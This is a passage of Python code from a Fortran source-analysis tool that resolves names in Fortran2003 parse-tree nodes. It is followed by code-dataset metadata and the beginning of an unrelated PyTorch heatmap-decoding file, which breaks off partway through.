defer(stmt, node.items[2], config)
def search_Array_Constructor(stmt, node, config, gentype=None):
""" Identifying a name in Array_Constructor node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Array_Section(stmt, node, config, gentype=None):
""" Identifying a name in Array_Section node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
defer(stmt, node.items[1], config)
def search_Substring_Range(stmt, node, config, gentype=None):
""" Identifying a name in Substring_Range node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Select_Case_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Select_Case_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Case_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Case_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Case_Selector(stmt, node, config, gentype=None):
""" Identifying a name in Case_Selector node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Call_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Call_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_subroutine, config)
#if isinstance(node.items[1], Fortran2003.Name):
# get_name_or_defer(stmt, node.items[1], res_value)
#else:
# defer(stmt, node.items[1])
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Char_Literal_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Char_Literal_Constant node"""
if node.items[1]:
get_name_or_defer(stmt, Fortran2003.Name(node.items[1]), res_typedecl, config)
#get_name_or_defer(stmt, node.items[0], res_typedecl)
def search_Length_Selector(stmt, node, config, gentype=None):
""" Identifying a name in Length_Selector node"""
for item in node.items:
get_name_or_defer(stmt, item, res_value, config)
def search_Type_Param_Value(stmt, node, config, gentype=None):
""" Identifying a name in Type_Param_Value node"""
# NOTE: need to verify its content structure
if node.item:
get_name_or_defer(stmt, node.item, res_value, config)
def search_Write_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Write_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Read_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Read_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Io_Control_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Io_Control_Spec node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Stop_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Stop_Stmt node"""
pass
def search_Contains_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Contains_Stmt node"""
pass
def search_Subscript_Triplet(stmt, node, config, gentype=None):
""" Identifying a name in Subscript_Triplet node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Interface_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Interface_Stmt node"""
pass
def search_Procedure_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Procedure_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_subprogram, config)
def search_Prefix(stmt, node, config, gentype=None):
""" Identifying a name in Prefix node"""
for item in node.items:
get_name_or_defer(stmt, node.items[0], res_anything, config)
def search_Prefix_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Prefix_Spec node"""
if node.item or hasattr(node, 'items'):
raise ProgramException('Unexpected item or items attr')
def search_Logical_Literal_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Logical_Literal_Constant node"""
if node.items[1]:
get_name_or_defer(stmt, Fortran2003.Name(node.items[1]), res_typedecl, config)
#get_name_or_defer(stmt, node.items[1], res_typedecl)
def search_Access_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Access_Spec node"""
pass
def search_And_Operand(stmt, node, config, gentype=None):
""" Identifying a name in And_Operand node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Equiv_Operand(stmt, node, config, gentype=None):
""" Identifying a name in Equiv_Operand node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Or_Operand(stmt, node, config, gentype=None):
""" Identifying a name in Or_Operand node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Where_Construct_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Where_Construct_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Elsewhere_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Elsewhere_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Suffix(stmt, node, config, gentype=None):
""" Identifying a name in Suffix node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Declaration_Type_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Declaration_Type_Spec node"""
get_name_or_defer(stmt, node.items[1], res_derivedtype, config)
def search_Data_Ref(stmt, node, config, gentype=None):
""" Identifying a name in Data_Ref node"""
from fortlab.kgutils import KGName
# NOTE: to limit the scope of data saving in derived type,
# the last part_ref would be the one that has config, gentype=gentype
if isinstance(node.items[0], Fortran2003.Name):
get_name_or_defer(stmt, node.items[0], res_value, config, gentype=gentype)
elif isinstance(node.items[0], Fortran2003.Part_Ref):
get_name_or_defer(stmt, node.items[0].items[0], res_value, config, gentype=gentype)
get_name_or_defer(stmt, node.items[0].items[1], res_value, config)
for item in node.items[1:]:
if isinstance(item, Fortran2003.Name): pass
elif isinstance(item, Fortran2003.Part_Ref):
get_name_or_defer(stmt, item.items[1], res_value, config)
elif item is None: pass
else: raise ProgramException('Unknown type: %s'%item.__class)
def search_Structure_Constructor(stmt, node, config, gentype=None):
""" Identifying a name in Structure_Constructor node"""
#get_name_or_defer(stmt, node.items[0], res_derivedtype)
# NOTE: parser found ordinary subprogram as Structure_Constructor
get_name_or_defer(stmt, node.items[0], res_value + res_derivedtype, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Binary_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Binary_Constant node"""
pass
def search_Octal_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Octal_Constant node"""
pass
def search_Hex_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Hex_Constant node"""
pass
def search_Intrinsic_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Intrinsic_Stmt node"""
pass
#get_name_or_defer(stmt, node.items[1], res_subprogram)
def search_Derived_Type_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Derived_Type_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Access_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Access_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_anything, config)
def search_Function_Reference(stmt, node, config, gentype=None):
""" Identifying a name in Function_Reference node"""
get_name_or_defer(stmt, node.items[0], res_function, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Return_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Return_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_function, config)
def search_Print_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Print_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Format(stmt, node, config, gentype=None):
""" Identifying a name in Format node"""
if hasattr(node, 'items') and len(node.items)>0:
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Implicit_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Implicit_Stmt node"""
if hasattr(node, 'items') and len(node.items)>0:
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Exit_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Exit_Stmt node"""
pass
def search_Pointer_Assignment_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Pointer_Assignment_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_ptr_object, config) # data pointer obj or procedure pointer obj
get_name_or_defer(stmt, node.items[2], res_target, config) # data target or procedure target
def search_Proc_Component_Ref(stmt, node, config, gentype=None):
""" Identifying a name in Proc_Component_Ref node"""
get_name_or_defer(stmt, node.items[0], res_value, config, gentype=gentype)
# Type definition may handle a procedure component name?
#get_name_or_defer(stmt, node.items[2], res_value)
def search_Io_Unit(stmt, node, config, gentype=None):
""" Identifying a name in Io_Unit node"""
if hasattr(node, 'items') and len(node.items)>0:
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Level_3_Expr(stmt, node, config, gentype=None):
""" Identifying a name in Level_3_Expr node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Open_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Open_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Connect_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Connect_Spec node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Endfile_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Endfile_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Position_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Position_Spec node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Close_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Close_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Close_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Close_Spec node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Label(stmt, node, config, gentype=None):
""" Identifying a name in Label node"""
pass
def search_Io_Implied_Do(stmt, node, config, gentype=None):
""" Identifying a name in Io_Implied_Do node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Io_Implied_Do_Control(stmt, node, config, gentype=None):
""" Identifying a name in Io_Implied_Do_Control node"""
get_name_or_defer(stmt, node.items[0], res_typedecl, config, gentype=KGGenType.STATE_OUT)
get_name_or_defer(stmt, node.items[1], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
get_name_or_defer(stmt, node.items[3], res_value, config)
def search_Format_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Format_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
# No need for searching format-items?
#get_name_or_defer(stmt, node.items[1], res_value)
def search_Format_Specification(stmt, node, config, gentype=None):
""" Identifying a name in Format_Specification node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Format_Item_C1002(stmt, node, config, gentype=None):
""" Identifying a name in Format_Item_C1002 node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Control_Edit_Desc(stmt, node, config, gentype=None):
""" Identifying a name in Control_Edit_Desc node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Format_Item(stmt, node, config, gentype=None):
""" Identifying a name in Format_Item node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Alloc_Opt(stmt, node, config, gentype=None):
""" Identifying a name in Alloc_Opt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Deallocate_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Deallocate_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Cycle_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Cycle_Stmt node"""
pass
def search_External_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in External_Stmt node"""
get_name_or_defer(stmt, node.items[1], \
[ TypeDeclarationStatement, Function, Subroutine ], config)
def search_Case_Value_Range(stmt, node, config, gentype=None):
""" Identifying a name in Case_Value_Range node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Forall_Construct_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Forall_Construct_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Forall_Header(stmt, node, config, gentype=None):
""" Identifying a name in Forall_Header node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Forall_Triplet_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Forall_Triplet_Spec node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
get_name_or_defer(stmt, node.items[3], res_value, config)
def search_Goto_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Goto_Stmt node"""
pass
def search_Continue_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Continue_Stmt node"""
pass
def search_Wait_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Wait_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Wait_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Wait_Spec node"""
if hasattr(node, 'items') and len(node.items)>0:
for item in node.items:
get_name_or_defer(stmt, item, res_value, config)
def search_Rewind_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Rewind_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Flush_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Flush_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Import_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Import_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_anything, config)
def search_Block_Data_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Block_Data_Stmt node"""
# NOTE: Temporary solution
pass
def search_Data_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Data_Stmt node"""
if hasattr(node, 'items') and len(node.items)>0:
for item in node.items:
get_name_or_defer(stmt, item, res_typedecl, config)
def search_Data_Stmt_Value(stmt, node, config, gentype=None):
""" Identifying a name in Data_Stmt_Value node"""
get_name_or_defer(stmt, node.items[0], res_typedecl, config)
get_name_or_defer(stmt, node.items[1], res_typedecl, config)
def search_Save_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Save_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_typedecl, config)
def search_Asynchronous_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Asynchronous_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_typedecl, config)
def search_Allocatable_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Allocatable_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_typedecl, config)
def search_Common_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Common_Stmt node"""
if hasattr(node, 'items') and len(node.items)>0:
for itemlist in node.items:
for name, _item in itemlist:
get_name_or_defer(stmt, _item, res_value, config)
def search_Data_Stmt_Set(stmt, node, config, gentype=None):
""" Identifying a name in Data_Stmt_Set node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Dimension_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Dimension_Stmt node"""
if hasattr(node, 'items') and len(node.items)>0:
for itemlist in node.items:
for name, _item in itemlist:
get_name_or_defer(stmt, _item, res_value, config)
def search_Equivalence_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Equivalence_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_typedecl, config)
def search_Equivalence_Set(stmt, node, config, gentype=None):
""" Identifying a name in Equivalence_Set node"""
get_name_or_defer(stmt, node.items[0], res_typedecl, config)
get_name_or_defer(stmt, node.items[1], res_typedecl, config)
def search_Intent_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Intent_Stmt node"""
#get_name_or_defer(stmt, node.items[0], res_typedecl)
get_name_or_defer(stmt, node.items[1], res_typedecl, config)
def search_Intent_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Intent_Spec node"""
pass
def search_Namelist_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Namelist_Stmt node"""
if hasattr(node, 'items') and len(node.items)>0:
for nlname, nlgroup in node.items:
get_name_or_defer(stmt, nlgroup, res_typedecl, config)
def search_Optional_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Optional_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_typedecl, config)
def search_Pointer_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Pointer_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_anything, config)
def search_Protected_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Protected_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_typedecl, config)
def search_Target_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Target_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_anything, config)
def search_Target_Entity_Decl(stmt, node, config, gentype=None):
""" Identifying a name in Target_Entity_Decl node"""
get_name_or_defer(stmt, node.items[0], res_anything, config)
defer(stmt, node.items[1], config)
get_name_or_defer(stmt, node.items[2], res_value, config)
get_name_or_defer(stmt, node.items[3], res_value, config)
def search_Volatile_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Volatile_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_anything, config)
def search_Value_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Value_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_typedecl, config)
def search_Backspace_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Backspace_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Forall_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Forall_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Inquire_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Inquire_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Inquire_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Inquire_Spec node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Nullify_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Nullify_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Where_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Where_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Arithmetic_If_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Arithmetic_If_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
get_name_or_defer(stmt, node.items[3], res_value, config)
def search_Computed_Goto_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Computed_Goto_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Actual_Arg_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Actual_Arg_Spec node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Data_Pointer_Object(stmt, node, config, gentype=None):
""" Identifying a name in Data_Pointer_Object node"""
get_name_or_defer(stmt, node.items[0], res_value, config, gentype=gentype)
if node.items[2] and not isinstance(node.items[2], Fortran2003.Name):
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Type_Attr_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Type_Attr_Spec node"""
if isinstance(node.items[0], str) and node.items[0]=='EXTENDS':
get_name_or_defer(stmt, node.items[1], res_derivedtype, config)
else:
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Level_5_Expr(stmt, node, config, gentype=None):
""" Identifying a name in Level_5_Expr node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Parameter_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Parameter_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Named_Constant_Def(stmt, node, config, gentype=None):
""" Identifying a name in Named_Constant_Def node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Saved_Entity(stmt, node, config, gentype=None):
""" Identifying a name in Saved_Entity node"""
if len(node.items)==3 and node.items[0]=='/' and node.items[2]=='/':
get_name_or_defer(stmt, node.items[1], res_common, config)
else:
for item in node.items:
get_name_or_defer(stmt, item, res_value, config)
def search_Alloc_Opt(stmt, node, config, gentype=None):
""" Identifying a name in Alloc_Opt node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Dealloc_Opt(stmt, node, config, gentype=None):
""" Identifying a name in Dealloc_Opt node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Generic_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Generic_Spec node"""
pass
def search_Assumed_Size_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Assumed_Size_Spec node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Common_Block_Object(stmt, node, config, gentype=None):
""" Identifying a name in Common_Block_Object node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Ac_Implied_Do(stmt, node, config, gentype=None):
""" Identifying a name in Ac_Implied_Do node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Ac_Implied_Do_Control(stmt, node, config, gentype=None):
""" Identifying a name in Ac_Implied_Do_Control node"""
get_name_or_defer(stmt, node.items[0], res_value, config, gentype=KGGenType.STATE_OUT)
if node.items[1]:
for item in node.items[1]:
get_name_or_defer(stmt, item, res_value, config)
def search_Specific_Binding(stmt, node, config, gentype=None):
""" Identifying a name in Specific_Binding node"""
get_name_or_defer(stmt, node.items[0], res_typespec + [ Interface ], config)
get_name_or_defer(stmt, node.items[1], res_value, config)
if not hasattr(node.items[1], 'string') or 'DEFERRED' not in node.items[1].string:
if node.items[3] is None:
get_name_or_defer(stmt, node.items[2], res_subprogram, config)
else:
get_name_or_defer(stmt, node.items[3], res_subprogram, config)
def search_Binding_Attr(stmt, node, config, gentype=None):
""" Identifying a name in Binding_Attr node"""
pass
def search_Masked_Elsewhere_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Masked_Elsewhere_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Procedure_Designator(stmt, node, config, gentype=None):
""" Identifying a name in Procedure_Designator node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
def search_Associate_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Associate_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Association(stmt, node, config, gentype=None):
""" Identifying a name in Association node"""
get_name_or_defer(stmt, node.items[2], res_value, config)
def search_Generic_Binding(stmt, node, config, gentype=None):
""" Identifying a name in Generic_Binding node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[2], [ SpecificBinding ], config)
def search_Complex_Literal_Constant(stmt, node, config, gentype=None):
""" Identifying a name in Complex_Literal_Constant node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Char_Length(stmt, node, config, gentype=None):
""" Identifying a name in Char_Length node"""
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Data_Implied_Do(stmt, node, config, gentype=None):
""" Identifying a name in Data_Implied_Do node"""
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config, gentype=KGGenType.STATE_OUT)
get_name_or_defer(stmt, node.items[2], res_value, config)
get_name_or_defer(stmt, node.items[3], res_value, config)
get_name_or_defer(stmt, node.items[4], res_value, config)
def search_Ac_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Ac_Spec node"""
defer(stmt, node.items[0], config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Sequence_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Sequence_Stmt node"""
pass
def search_Stmt_Function_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in Stmt_Function_Stmt node"""
get_name_or_defer(stmt, node.items[0], res_typedecl, config)
def search_Language_Binding_Spec(stmt, node, config, gentype=None):
""" Identifying a name in Language_Binding_Spec node"""
# No need to resolve exteranl c library routines
pass
def search_Select_Type_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in search_Select_Type_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_typedecl, config)
def search_Type_Guard_Stmt(stmt, node, config, gentype=None):
""" Identifying a name in search_Type_Guard_Stmt node"""
get_name_or_defer(stmt, node.items[1], res_typespec, config)
#show_tree(node)
#import pdb ;pdb.set_trace()
def search_Implicit_Spec(stmt, node, config, gentype=None):
"""
<implicit-spec> = <declaration-type-spec> ( <letter-spec-list> )
"""
get_name_or_defer(stmt, node.items[0], res_typespec, config)
get_name_or_defer(stmt, node.items[1], res_typespec, config)
def search_Letter_Spec(stmt, node, config, gentype=None):
pass
def search_Procedure_Declaration_Stmt(stmt, node, config, gentype=None):
get_name_or_defer(stmt, node.items[0], [Interface], config)
get_name_or_defer(stmt, node.items[1], res_value, config)
#show_tree(node)
#import pdb ;pdb.set_trace()
def search_Binding_PASS_Arg_Name(stmt, node, config, gentype=None):
#show_tree(node)
#import pdb ;pdb.set_trace()
pass
def search_Char_Selector(stmt, node, config, gentype=None):
get_name_or_defer(stmt, node.items[0], res_value, config)
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Enum_Def_Stmt(stmt, node, config, gentype=None):
pass
def search_Enumerator_Def_Stmt(stmt, node, config, gentype=None):
get_name_or_defer(stmt, node.items[1], res_value, config)
def search_Enumerator(stmt, node, config, gentype=None):
get_name_or_defer(stmt, node.items[2], res_value, config)
| 43.843121
| 120
| 0.697384
| 7,584
| 52,261
| 4.564082
| 0.050369
| 0.119489
| 0.067343
| 0.104755
| 0.815855
| 0.771451
| 0.752441
| 0.737101
| 0.727509
| 0.703675
| 0
| 0.0109
| 0.180192
| 52,261
| 1,191
| 121
| 43.879933
| 0.797008
| 0.20367
| 0
| 0.500739
| 0
| 0
| 0.024076
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.273264
| false
| 0.04579
| 0.023634
| 0
| 0.305761
| 0.01034
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff59b00d20c33151f9f2dd25610a80e8b73fe9b2
| 12,098
|
py
|
Python
|
lib/models/decode.py
|
shachargluska/centerpose
|
01c2c8bfa9d3ee91807f2ffdcc48728d104265bd
|
[
"MIT"
] | 245
|
2019-11-29T02:55:25.000Z
|
2022-03-30T07:30:18.000Z
|
lib/models/decode.py
|
shachargluska/centerpose
|
01c2c8bfa9d3ee91807f2ffdcc48728d104265bd
|
[
"MIT"
] | 24
|
2019-11-29T10:05:00.000Z
|
2022-03-30T07:16:06.000Z
|
lib/models/decode.py
|
FishLiuabc/centerpose
|
555d753cd82693476f91f78c53aa4147f5a83015
|
[
"MIT"
] | 45
|
2019-11-29T05:12:02.000Z
|
2022-03-21T02:20:36.000Z
|
from __future__ import absolute_import, division, print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
from .utils import _gather_feat, _transpose_and_gather_feat
def _nms(heat, kernel=3):
pad = (kernel - 1) // 2
hmax = nn.functional.max_pool2d(
heat, (kernel, kernel), stride=1, padding=pad)
keep = (hmax == heat).float()
return heat * keep
def _left_aggregate(heat):
'''
heat: batchsize x channels x h x w
'''
shape = heat.shape
heat = heat.reshape(-1, heat.shape[3])
heat = heat.transpose(1, 0).contiguous()
ret = heat.clone()
for i in range(1, heat.shape[0]):
inds = (heat[i] >= heat[i - 1])
ret[i] += ret[i - 1] * inds.float()
return (ret - heat).transpose(1, 0).reshape(shape)
def _right_aggregate(heat):
'''
heat: batchsize x channels x h x w
'''
shape = heat.shape
heat = heat.reshape(-1, heat.shape[3])
heat = heat.transpose(1, 0).contiguous()
ret = heat.clone()
for i in range(heat.shape[0] - 2, -1, -1):
inds = (heat[i] >= heat[i +1])
ret[i] += ret[i + 1] * inds.float()
return (ret - heat).transpose(1, 0).reshape(shape)
def _top_aggregate(heat):
'''
heat: batchsize x channels x h x w
'''
heat = heat.transpose(3, 2)
shape = heat.shape
heat = heat.reshape(-1, heat.shape[3])
